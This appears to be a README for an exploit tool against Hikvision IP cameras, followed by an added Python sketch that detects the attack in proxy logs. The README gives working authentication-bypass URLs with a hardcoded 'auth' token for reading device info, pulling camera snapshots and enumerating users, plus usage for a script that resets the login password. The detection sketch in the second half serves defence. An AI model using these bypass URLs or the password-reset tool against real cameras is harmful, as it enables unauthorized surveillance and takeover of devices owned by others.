Exploit tool for Hikvision IP Camera 5.4.0
Written for Python 3.9; just download and execute.
-
Information gathering: http://[IP Address]:[port]/System/deviceInfo?auth=YWRtaW46MTEK shows the firmware version and the rest of the device information.
-
Get an unauthorized snapshot from the camera: http://[IP Address]:[port]/onvif-http/snapshot?auth=YWRtaW46MTEK
-
Enumerate users: http://[IP Address]:[port]/Security/users?auth=YWRtaW46MTEK
-
Execute the payload:
Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
Example: python3 exploit.py 10.10.10.10 8899 Y
-
Done. You can now log in with the new password.
Modified from the original exploit; exploit author: Matamorphosis
https://www.exploit-db.com/exploits/44328
https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
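
Detection note (an added example, not part of the original tool): every URL listed above carries an `auth` query parameter, so the activity stands out in the access log of a reverse proxy or gateway placed in front of the camera. The sketch below assumes combined-format log lines; the function names, the path prefix list and the sample lines are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Path prefixes taken from the URLs listed in this README.
WATCHED_PREFIXES = ("/System/", "/Security/", "/onvif-http/")
# Minimal combined-log-format matcher: client IP, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /System/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/Mar/2024:10:01:05 +0000] "GET /onvif-http/snapshot?auth=YWRtaW46MTEK HTTP/1.1" 200 48211',
    '192.0.2.15 - - [12/Mar/2024:10:02:11 +0000] "GET /doc/page/login.asp HTTP/1.1" 200 1423',
    '203.0.113.9 - - [12/Mar/2024:10:03:40 +0000] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 401 0',
]


def decode_auth(value):
    """Return the base64-decoded auth value, or None if it does not decode."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8").strip()
    except (ValueError, UnicodeDecodeError):
        return None


def find_auth_param_requests(lines):
    """Yield one finding per request to a watched path that carries ?auth=."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, method, target, status = m.groups()
        url = urlsplit(target)
        values = parse_qs(url.query).get("auth")
        if not values or not url.path.startswith(WATCHED_PREFIXES):
            continue
        # "served" marks a 2xx answer, i.e. the device honoured the request.
        yield {"client": client, "method": method, "path": url.path,
               "status": int(status), "decoded": decode_auth(values[0]),
               "served": status.startswith("2")}


if __name__ == "__main__":
    for finding in find_auth_param_requests(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true means the device answered the request with a 2xx status and should be treated as exposed; a 401 on the same request indicates the device rejected it.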